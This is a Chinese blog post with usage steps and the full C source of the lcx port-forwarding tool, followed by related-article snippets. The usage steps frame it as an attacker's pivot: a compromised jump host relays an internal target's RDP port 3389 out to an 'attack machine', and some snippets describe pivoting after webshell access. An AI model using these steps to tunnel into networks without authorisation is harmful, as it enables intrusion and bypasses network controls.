lcx端口转发 linux版

一、端口转发使用

1、攻击机上执行以下命令

./lcx -p1 2222 -p2 3389 -m 2

在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口

2、跳板机上执行以下命令

./lcx -h1 attackip -p1 2222 -h2 dstip -p2 3389 -m 3

与攻击机建立连接,并将来自攻击机2222端口的数据全部转发到目标机端口的3389 端口

3、以上连接建立完成后,就可以通过连接攻击机的3389端口,进行访问目标机的3389端口

二、代码

/* Socket data transport tool
* by bkbll([email protected])
* [[email protected] socket]$ uname -a
* Linux mobile 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
* [[email protected] socket]$ gcc -o trtool trtool.c
* [[email protected] socket]$ ./trtool
* Socket data transport tool
* by bkbll([email protected])
* Usage:./trtool -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
* -v: version
* -h1: host1
* -h2: host2
* -p1: port1
* -p2: port2
* -log: log the data
* -m: the action method for this tool
* 1: listen on PORT1 and connect to HOST2:PORT2
* 2: listen on PORT1 and PORT2
* 3: connect to HOST1:PORT1 and HOST2:PORT2
*/
#include <sys/time.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>

#define VERSION "2.2"
#define TIMEOUT 300
#define max(a,b) (a)>(b)?(a):(b)
#define MAXSIZE 10240
#define HOSTLEN 40
#define CONNECT_NUMBER 5

/* define function here */
void usage(char *s);
void transdata(int fd1,int fd2);
void closeallfd(int);
void makelog(char *buffer,int length);
int testifisvalue(char *str);
int bind2conn(int port1,char *host,int port2);
int bind2bind(int port1,int port2);
int conn2conn(char *host1,int port1,char *host2,int port2);
int create_socket();
int create_serv(int sockfd,int port);
int client_connect(int sockfd,char* server,int port);

/* define GLOBAL varible here */
extern int errno;
FILE *fp;

int main(int argc,char **argv)
{
    char **p;
    char host1[HOSTLEN],host2[HOSTLEN];
    int port1=0,port2=0,method=0;
    int length;
    char *logfile=NULL;

    p=argv;
    memset(host1,0,HOSTLEN);
    memset(host2,0,HOSTLEN);
    while(*p)
    {
        if(strcmp(*p,"-v")==0)
        {
            printf("Socket data transport tool.\r\nVersion:%s\r\n",VERSION);
            p++;
            continue;
        }
        if(strcmp(*p,"-h1")==0)
        {
            if(testifisvalue(*(p+1))==1)
            {
                length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1));
                strncpy(host1,*(++p),length);
            }
            p++;
            continue;
        }
        if(strcmp(*p,"-h2")==0)
        {
            if(testifisvalue(*(p+1))==1)
            {
                length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1));
                strncpy(host2,*(++p),length);
            }
            p++;
            continue;
        }
        if(strcmp(*p,"-p1")==0)
        {
            if(testifisvalue(*(p+1))==1)
                port1=atoi(*(++p));
            p++;
            continue;
        }
        if(strcmp(*p,"-p2")==0)
        {
            if(testifisvalue(*(p+1))==1)
                port2=atoi(*(++p));
            p++;
            continue;
        }
        if(strcmp(*p,"-m")==0)
        {
            if(testifisvalue(*(p+1))==1)
                method=atoi(*(++p));
            p++;
            continue;
        }
        if(strcmp(*p,"-log")==0)
        {
            if(testifisvalue(*(p+1))==1)
                logfile=*(++p);
            else
            {
                printf("[ERROR]:must supply logfile name\r\n");
                exit(0);
            }
            p++;
            continue;
        }
        p++;
    }
    signal(SIGCLD,SIG_IGN);
    signal(SIGINT,&closeallfd);
    if(logfile !=NULL)
    {
        fp=fopen(logfile,"a");
        if(fp == NULL )
        {
            perror("open logfile");
            exit(0);
        }
    }
    makelog("######################## start ################\r\n",49);
    switch(method)
    {
    case 0:
        usage(argv[0]);
        break;
    case 1:
        if((port1==0) || (port2==0))
        {
            printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
            break;
        }
        if(strlen(host2)==0)
        {
            printf("[ERROR]:must supply HOST2.\r\n");
            break;
        }
        bind2conn(port1,host2,port2);
        break;
    case 2:
        if((port1==0) || (port2==0))
        {
            printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
            break;
        }
        bind2bind(port1,port2);
        break;
    case 3:
        if((port1==0) || (port2==0))
        {
            printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
            break;
        }
        if(strlen(host1)==0)
        {
            printf("[ERROR]:must supply HOST1.\r\n");
            break;
        }
        if(strlen(host2)==0)
        {
            printf("[ERROR]:must supply HOST2.\r\n");
            break;
        }
        conn2conn(host1,port1,host2,port2);
        break;
    default:
        usage(argv[0]);
    }
    closeallfd(0);
}

int testifisvalue(char *str)
{
    if(str == NULL ) return(0);
    if(str[0]==‘-‘) return(0);
    return(1);
}

void usage(char *s)
{
    printf("Socket data transport tool\r\n");
    printf("by bkbll([email protected])\r\n\r\n");
    printf("Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]\r\n",s);
    printf(" -v: version\r\n");
    printf(" -h1: host1\r\n");
    printf(" -h2: host2\r\n");
    printf(" -p1: port1\r\n");
    printf(" -p2: port2\r\n");
    printf(" -log: log the data\r\n");
    printf(" -m: the action method for this tool\r\n");
    printf(" 1: listen on PORT1 and connect to HOST2:PORT2\r\n");
    printf(" 2: listen on PORT1 and PORT2\r\n");
    printf(" 3: connect to HOST1:PORT1 and HOST2:PORT2\r\n");

    closeallfd(0);
}

int bind2conn(int port1,char *host,int port2)
{
    int sockfd,sockfd1,sockfd2;
    struct sockaddr_in remote;
    int size;
    int pid;
    char buffer[1024];

    memset(buffer,0,1024);
    if((sockfd=create_socket())==0) exit(0);
    if(create_serv(sockfd,port1)==0)
    {
        close(sockfd1);
        exit(0);
    }
    size=sizeof(struct sockaddr);
    while(1)
    {
        printf("waiting for response.........\n");
        if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,(socklen_t *)&size))<0)
        {
            perror("accept error\n");
            continue;
        }
        printf("accept a client from %s:%d\n",inet_ntoa(remote.sin_addr),ntohs(remote.sin_port));
        if((sockfd2=create_socket())==0)
        {
            close(sockfd1);
            continue;
        }
        printf("make a connection to %s:%d....",host,port2);
        fflush(stdout);
        if(client_connect(sockfd2,host,port2)==0)
        {
            close(sockfd2);
            sprintf(buffer,"[SERVER]connection to %s:%d error\r\n",host,port2);
            write(sockfd1,buffer,strlen(buffer));
            memset(buffer,0,1024);
            close(sockfd1);
            continue;
        }
        printf("ok\r\n");
        pid=fork();
        if(pid==0) transdata(sockfd1,sockfd2);
        // sleep(2);
        close(sockfd1);
        close(sockfd2);
    }

}

int bind2bind(int port1,int port2)
{
    int fd1,fd2,sockfd1,sockfd2;
    struct sockaddr_in client1,client2;
    int size1,size2;
    int pid;

    if((fd1=create_socket())==0) exit(0);
    if((fd2=create_socket())==0) exit(0);
    printf("binding port %d......",port1);
    fflush(stdout);
    if(create_serv(fd1,port1)==0)
    {
        close(fd1);
        exit(0);
    }
    printf("ok\r\n");
    printf("binding port %d......",port2);
    fflush(stdout);
    if(create_serv(fd2,port2)==0)
    {
        close(fd2);
        exit(0);
    }
    printf("ok\r\n");
    size1=size2=sizeof(struct sockaddr);
    while(1)
    {
        printf("waiting for response on port %d.........\n",port1);
        if((sockfd1=accept(fd1,(struct sockaddr *)&client1,(socklen_t *)&size1))<0)
        {
            perror("accept1 error");
            continue;
        }
        printf("accept a client on port %d from %s,waiting another on port %d....\n",port1,inet_ntoa(client1.sin_addr),port2);
        if((sockfd2=accept(fd2,(struct sockaddr *)&client2,(socklen_t *)&size2))<0)
        {
            perror("accept2 error");
            close(sockfd1);
            continue;
        }
        printf("accept a client on port %d from %s\n",port2,inet_ntoa(client2.sin_addr));
        pid=fork();
        if(pid==0) transdata(sockfd1,sockfd2);
        //sleep(2);
        close(sockfd1);
        close(sockfd2);
    }
}

int conn2conn(char *host1,int port1,char *host2,int port2)
{
    int sockfd1,sockfd2;
    int pid;
    fd_set fds;
    int l;
    int result;
    char buffer[MAXSIZE];

    while(1)
    {
        if((sockfd1=create_socket())==0) exit(0);
        if((sockfd2=create_socket())==0) exit(0);
        printf("[+] make a connection to %s:%d....\r\n",host1,port1);
        fflush(stdout);
        if(client_connect(sockfd1,host1,port1)==0)
        {
            printf("[-] connect to host1 failed\r\n");
            close(sockfd1);
            close(sockfd2);
            continue;
        }
        printf("[+] host1 connected\r\n");
        l=0;
        memset(buffer,0,MAXSIZE);
        //fixed by Twi1ight 2012.09.12
        while(1)
        {
            FD_ZERO(&fds);
            FD_SET(sockfd1, &fds);
            if (select(sockfd1+1, &fds, NULL, NULL, NULL) < 0 )
            {
                if (errno == EINTR) continue;
                break;
            }

            if (FD_ISSET(sockfd1, &fds))
            {
                l=read(sockfd1, buffer, MAXSIZE);
                break;
            }
            sleep(5);
        }
        if(l<=0)
        {
            printf("[-] there is a error...Create a new connection.\r\n");
            continue;
        }
        while(1)
        {
            printf("[+] make a connection to %s:%d....\r\n",host2,port2);
            fflush(stdout);
            if(client_connect(sockfd2,host2,port2)==0)
            {
                printf("[-] connect to host2 failed\r\n");
                close(sockfd1);
                close(sockfd2);
                continue;
            }
            if(write(sockfd2,buffer,l) < 0)
            {
                printf("[-] send failed.\r\n");
                continue;
            }
            l=0;
            memset(buffer,0,MAXSIZE);
            break;
        }
        printf("[+] all hosts connected!\r\n");
        pid=fork();
        if(pid==0) transdata(sockfd1,sockfd2);
        //sleep(2);
        close(sockfd1);
        close(sockfd2);
    }
}

void transdata(int fd1,int fd2)
{
    struct timeval timeset;
    fd_set readfd,writefd;
    int result,i=0;
    char read_in1[MAXSIZE],send_out1[MAXSIZE];
    char read_in2[MAXSIZE],send_out2[MAXSIZE];
    int read1=0,totalread1=0,send1=0;
    int read2=0,totalread2=0,send2=0;
    int sendcount1,sendcount2;
    int maxfd;
    struct sockaddr_in client1,client2;
    int structsize1,structsize2;
    char host1[20],host2[20];
    int port1=0,port2=0;
    char tmpbuf1[100],tmpbuf2[100];

    memset(host1,0,20);
    memset(host2,0,20);
    memset(tmpbuf1,0,100);
    memset(tmpbuf2,0,100);
    if(fp!=NULL)
    {
        structsize1=sizeof(struct sockaddr);
        structsize2=sizeof(struct sockaddr);
        if(getpeername(fd1,(struct sockaddr *)&client1,(socklen_t *)&structsize1)<0)
        {
            strcpy(host1,"fd1");
        }
        else
        {
            printf("got,ip:%s,port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port));
            strcpy(host1,inet_ntoa(client1.sin_addr));
            port1=ntohs(client1.sin_port);
        }
        if(getpeername(fd2,(struct sockaddr *)&client2,(socklen_t *)&structsize2)<0)
        {
            strcpy(host2,"fd2");
        }
        else
        {
            printf("got,ip:%s,port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port));
            strcpy(host2,inet_ntoa(client2.sin_addr));
            port2=ntohs(client2.sin_port);
        }
        sprintf(tmpbuf1,"\r\n########### read from %s:%d ####################\r\n",host1,port1);
        sprintf(tmpbuf2,"\r\n########### reply from %s:%d ####################\r\n",host2,port2);
    }

    maxfd=max(fd1,fd2)+1;
    memset(read_in1,0,MAXSIZE);
    memset(read_in2,0,MAXSIZE);
    memset(send_out1,0,MAXSIZE);
    memset(send_out2,0,MAXSIZE);

    timeset.tv_sec=TIMEOUT;
    timeset.tv_usec=0;
    while(1)
    {
        FD_ZERO(&readfd);
        FD_ZERO(&writefd);

        FD_SET(fd1,&readfd);
        FD_SET(fd1,&writefd);
        FD_SET(fd2,&writefd);
        FD_SET(fd2,&readfd);

        result=select(maxfd,&readfd,&writefd,NULL,&timeset);
        if((result<0) && (errno!=EINTR))
        {
            perror("select error");
            break;
        }
        else if(result==0)
        {
            printf("time out\n");
            break;
        }
        if(FD_ISSET(fd1,&readfd))
        {
            /* 不能超过MAXSIZE-totalread1,不然send_out1会溢出 */
            if(totalread1<MAXSIZE)
            {
                read1=read(fd1,read_in1,MAXSIZE-totalread1);
                if(read1==0) break;
                if((read1<0) && (errno!=EINTR))
                {
                    perror("read data error");
                    break;
                }
                memcpy(send_out1+totalread1,read_in1,read1);
                makelog(tmpbuf1,strlen(tmpbuf1));
                makelog(read_in1,read1);
                totalread1+=read1;
                memset(read_in1,0,MAXSIZE);
            }
        }
        if(FD_ISSET(fd2,&writefd))
        {
            int err=0;
            sendcount1=0;
            while(totalread1>0)
            {
                send1=write(fd2,send_out1+sendcount1,totalread1);
                if(send1==0)break;
                if((send1<0) && (errno!=EINTR))
                {
                    perror("unknow error");
                    err=1;
                    break;
                }
                if((send1<0) && (errno==ENOSPC)) break;
                sendcount1+=send1;
                totalread1-=send1;
            }
            if(err==1) break;
            if((totalread1>0) && (sendcount1>0))
            {
                /* 移动未发送完的数据到开始 */
                memcpy(send_out1,send_out1+sendcount1,totalread1);
                memset(send_out1+totalread1,0,MAXSIZE-totalread1);
            }
            else
                memset(send_out1,0,MAXSIZE);
        }
        if(FD_ISSET(fd2,&readfd))
        {

            if(totalread2<MAXSIZE)
            {
                read2=read(fd2,read_in2,MAXSIZE-totalread2);
                if(read2==0)break;
                if((read2<0) && (errno!=EINTR))
                {
                    perror("read data error");
                    break;
                }
                memcpy(send_out2+totalread2,read_in2,read2);
                makelog(tmpbuf2,strlen(tmpbuf2));
                makelog(read_in2,read2);
                totalread2+=read2;
                memset(read_in2,0,MAXSIZE);
            }
        }
        if(FD_ISSET(fd1,&writefd))
        {
            int err2=0;
            sendcount2=0;
            while(totalread2>0)
            {
                send2=write(fd1,send_out2+sendcount2,totalread2);
                if(send2==0)break;
                if((send2<0) && (errno!=EINTR))
                {
                    perror("unknow error");
                    err2=1;
                    break;
                }
                if((send2<0) && (errno==ENOSPC)) break;
                sendcount2+=send2;
                totalread2-=send2;
            }
            if(err2==1) break;
            if((totalread2>0) && (sendcount2 > 0))
            {
                /* 移动未发送完的数据到开始 */
                memcpy(send_out2,send_out2+sendcount2,totalread2);
                memset(send_out2+totalread2,0,MAXSIZE-totalread2);
            }
            else
                memset(send_out2,0,MAXSIZE);
        }
    }

    close(fd1);
    close(fd2);
    printf("ok,I closed the two fd\r\n");
    //exit(0);
}

void closeallfd(int n)
{
    int i;
    printf("Let me exit...");
    fflush(stdout);
    for(i=3;i<256;i++)
    {
        close(i);
    }
    if(fp != NULL)
    {
        fprintf(fp,"exited\r\n");
        fclose(fp);
    }
    printf("all overd\r\n");
    exit(0);
}
void makelog(char *buffer,int length)
{
    if(fp !=NULL)
    {
        //fprintf(fp,"%s",buffer);
        write(fileno(fp),buffer,length);
        fflush(fp);
    }
}

int create_socket()
{
    int sockfd;

    sockfd=socket(AF_INET,SOCK_STREAM,0);
    if(sockfd<0)
    {
        perror("create socket error");
        return(0);
    }
    return(sockfd);
}

int create_serv(int sockfd,int port)
{
    struct sockaddr_in srvaddr;
    int on=1;

    bzero(&srvaddr,sizeof(struct sockaddr));
    srvaddr.sin_port=htons(port);
    srvaddr.sin_family=AF_INET;
    srvaddr.sin_addr.s_addr=htonl(INADDR_ANY);

    setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port
    if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0)
    {
        perror("error");
        return(0);
    }
    if(listen(sockfd,CONNECT_NUMBER)<0)
    {
        perror("listen error\n");
        return(0);
    }
    return(1);
}

int client_connect(int sockfd,char* server,int port)
{
    struct sockaddr_in cliaddr;
    struct hostent *host;

    if(!(host=gethostbyname(server)))
    {
        printf("gethostbyname(%s) error:%s\n",server,strerror(errno));
        return(0);
    }

    bzero(&cliaddr,sizeof(struct sockaddr));
    cliaddr.sin_family=AF_INET;
    cliaddr.sin_port=htons(port);
    cliaddr.sin_addr=*((struct in_addr *)host->h_addr);

    if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
    {
        perror("[-] error");
        return(0);
    }
    return(1);
}

原文地址:https://www.cnblogs.com/zlgxzswjy/p/9722287.html

时间: 2024-11-13 08:07:58

lcx端口转发 linux版的相关文章

rtcp.py与lcx配合转发3389端口,速度远好于80端口的socks反向代理

遇到一台内网服务器,只映射了个80端口(aspx网页). 本来想用regeorg做个网页socks代理, 结果速度奇慢. 现在发现还是单一的端口转发好,3389转出来画面卡顿尚能接受. 于是上传了lcx做转发 哪台公网机器做接受呢?选择了linux而不是win,因为win的话大概需要登录3389图形界面才好,没ssh来得直接和快速. lcx有个linux版的,不过转发体验很差,于是选择知道创宇的rtcp.py 10.0.1.3内网机: lcx -slave 8.8.8.8 8887 10.0.1

Linux端口转发的几种常用方法

0x00 背景 端口转发是一个常用的功能,不管是在服务器运维还是在渗透领域,都需要用到.在近期遇到一个问题就是一个服务的端口不能进行配置,但是由于出口硬件防火墙的原因,为了不修改硬件防火墙的策略,所以只能在本地做端口转发.因此尝试和寻找了以下的几种方法. 0x01 iptables和firewall iptables iptables是我第一个想到的方法,但却是最后一个尝试的,因为我对iptables并不熟悉. 1.打开IP转发功能. linux的IP转发功能是默认关闭的,而且根据很多安全加固策

Linux-Windows 端口转发

在实际的生产环境中,我们为了安全性,会将一些重要的服务(数据库服务)不开放外网访问,但是当我们某个时刻由于一些特殊需求,需要进行外网访问的时候,我们可以通过端口转发来实现.通过一台和与服务可以互相访问的主机,通过该主机进行端口转发. Windows 端口转发 Linux 端口转发 一.Windows 端口转发 windows 主要是通过 netsh 进行端口转发. listenaddress # 本地监听的ip listenport # 本地监听的端口 connectaddress # 转发请求

[转帖]Linux-Windows 端口转发 netsh 还有 rinetd

https://www.cnblogs.com/operationhome/p/11284559.html 之前自己学习过 netsh 也曾经用过frp 这次学习一下表 rinetd 感觉工具有很多 需要一直保持学习的心态. 在实际的生产环境中,我们为了安全性,会将一些重要的服务(数据库服务)不开放外网访问,但是当我们某个时刻由于一些特殊需求,需要进行外网访问的时候,我们可以通过端口转发来实现.通过一台和与服务可以互相访问的主机,通过该主机进行端口转发. Windows 端口转发 Linux 端

iptables实现端口转发

iptables实现端口转发 Linux下iptables不仅可以用来做防火墙还可以用来做端口转发 示例: 将本机的8080端口转发至其他主机,主机IP:192.168.1.12,目标主机IP和端口:192.168.1.13:8088,规则如下 iptables -t nat -A PREROUTING -p tcp -m tcp --dport 8080 -j DNAT --to-destination 192.168.1.13:8088 iptables -t nat -A POSTROUT

Linux版VMware使用DHCP为虚拟机分配固定IP及实现NAT网络端口转发

首先介绍一下环境: 1. Host(宿主计算机)的操作系统是Scientific Linux,内核版本2.6.18,主机名SPVM02,IP地址135.100.101.102,部署的是VMware Workstation 8. 2. Guest(虚拟机)这边安装的操作系统是Windows 7. 3. Guest使用vmnet8这块网卡,通过NAT协议实现上网. 需要实现的功能是Host网络中的其他计算机使用Microsoft Remote Desktop远程登录Guest桌面.所以探索如何通过配

端口转发工具lcx使用两类

lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口.它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色.lcx进行端口转发的原理就是使不同端口之间形成一个回路(如图1).它常用于外网连接内网3389端口. 这个工具很早就已经有了,它的全名叫Socket data transport tool,简写做trtool,由红盟联盟的前辈bkbll所写,功能和lio

Linux通过端口转发来访问内网服务(端口转发访问阿里云Redis数据库等服务)

# 安装rinetd wget http://www.boutell.com/rinetd/http/rinetd.tar.gz&&tar -xvf rinetd.tar.gz&&cd rinetd sed -i 's/65536/65535/g' rinetd.c (修改端口范围) mkdir /usr/man&&make&&make install 说明:IP的端口是双字节,也就是256*256-1, 256*256对计算机来说就是0,因

Windows 和 Linux 平台下的端口转发工具

原文地址: http://unmi.cc/windows-linux-port-forwarding/ 这里记录一下我曾经使用过的几个端口转发工具,即端口映射.端口重定向,和 NAT 也是差不多的概念. Linux 下用过 iptables,rinetd:Windows 下用过某个防火墙的 NAT 功能.RemoteAnywhere 的端口重定向.FPipe,还有最近刚找到的 PassPort.试着去设置一下 Windows 2000 的 NAT  功能,但未成功,还是特定的软件简单易用,下面介